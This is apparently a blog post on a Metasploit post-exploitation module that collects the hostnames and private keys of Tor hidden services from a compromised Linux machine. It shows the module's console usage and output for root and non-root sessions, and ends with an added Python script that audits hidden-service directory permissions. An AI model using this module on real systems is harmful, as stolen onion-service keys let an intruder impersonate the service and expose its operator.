
Grab Tor hidden service configurations in Linux – Advanced Footprinting

This is a clean post-exploitation module that steals the hostnames and private keys of Tor hidden services hosted on the target machine. The technique can be used in advanced footprinting as well as in forensics.

Tested against a Debian GNU/Linux 8 target running kernel version 3.16.0-4-amd64, from an Arch Linux machine running kernel version 4.11.3-1-ARCH.

What it does

  • Searches for the Tor configuration file “torrc” (typically /etc/tor/torrc, though the location can differ).
  • Parses that file for lines starting with “HiddenServiceDir” and collects the locations of the hidden services on the system (again, typically /var/lib/tor/… by default on most distros).
  • Finally, loots the “hostname” and “private_key” files found in each of these directories.

Example Output for root session

msf > use post/linux/gather/tor_hiddenservices
msf post(tor_hiddenservices) > set SESSION 1
SESSION => 1
msf post(tor_hiddenservices) > run

[*] Running module against 10.0.2.15
[*] Info:
[*] 	Debian GNU/Linux 8  
[*] 	Linux hidden 3.16.0-4-amd64 #1 SMP Debian 3.16.43-2 (2017-04-30) x86_64 GNU/Linux
[*] Looking for torrc...
[+] Torrc file found at /etc/tor/torrc
[+] Hidden Services found!
[*] hidden stored in /home/user/.msf4/loot/20170606210603_default_192.168.1.140_tor.hidden.hostn_479046.txt
[*] hidden stored in /home/user/.msf4/loot/20170606210603_default_192.168.1.140_tor.hidden.priva_933706.txt
[*] Post module execution completed

Example Output for non-root session

msf > use post/linux/gather/tor_hiddenservices
msf post(tor_hiddenservices) > set SESSION 2
SESSION => 2
msf post(tor_hiddenservices) > run

[*] Running module against 10.0.2.15
[*] Info:
[*] 	Debian GNU/Linux 8  
[*] 	Linux hidden 3.16.0-4-amd64 #1 SMP Debian 3.16.43-2 (2017-04-30) x86_64 GNU/Linux
[*] Looking for torrc...
[+] Torrc file found at /etc/tor/torrc
[+] Hidden Services found!
[-] Hidden Services were found, but we need root to access the directories
[*] Post module execution completed
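
The non-root run above is stopped only by filesystem permissions on the hidden service directories. The following Python script is an added example, not part of the original post or of the Metasploit module: it audits that control by reading the HiddenServiceDir entries from a torrc and flagging any directory, "hostname" or "private_key" file that grants group or other access. The function names (hidden_service_dirs, audit, demo) are hypothetical, and the sample torrc and directories are constructed in a temporary directory.

```python
import os
import stat
import tempfile
KEY_FILES = ("hostname", "private_key")  # the two files the post names

def hidden_service_dirs(torrc_path):
    """Return HiddenServiceDir values from a torrc, ignoring '#' comments."""
    dirs = []
    with open(torrc_path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            parts = line.split("#", 1)[0].split(None, 1)
            if len(parts) == 2 and parts[0].lower() == "hiddenservicedir":
                dirs.append(parts[1].strip())
    return dirs

def audit(torrc_path):
    """Return (path, problem) pairs. Only metadata is checked, never contents."""
    findings = []
    for d in hidden_service_dirs(torrc_path):
        for path in [d] + [os.path.join(d, n) for n in KEY_FILES]:
            try:
                st = os.stat(path)
            except OSError:
                continue  # missing, or not reachable from this account
            if st.st_mode & (stat.S_IRWXG | stat.S_IRWXO):
                mode = stat.S_IMODE(st.st_mode)
                findings.append((path, "group/other access, mode %o" % mode))
    return findings

def demo():
    """Constructed sample: one locked-down service directory and one loose one."""
    root = tempfile.mkdtemp()
    good, bad = os.path.join(root, "hs_good"), os.path.join(root, "hs_bad")
    for d, dmode, fmode in ((good, 0o700, 0o600), (bad, 0o755, 0o644)):
        os.mkdir(d)
        for name in KEY_FILES:
            with open(os.path.join(d, name), "w") as fh:
                fh.write("constructed placeholder\n")
            os.chmod(os.path.join(d, name), fmode)
        os.chmod(d, dmode)
    torrc = os.path.join(root, "torrc")
    with open(torrc, "w") as fh:
        fh.write("# constructed\nHiddenServiceDir %s\n#HiddenServiceDir /x\n"
                 "HiddenServiceDir %s # loose\n" % (good, bad))
    return torrc, good, bad, audit(torrc)

if __name__ == "__main__":
    for path, problem in demo()[3]:
        print(path, "->", problem)
```

On a real host, call audit("/etc/tor/torrc") as root or as the account Tor runs under; an empty result means none of the listed paths grant group or other access.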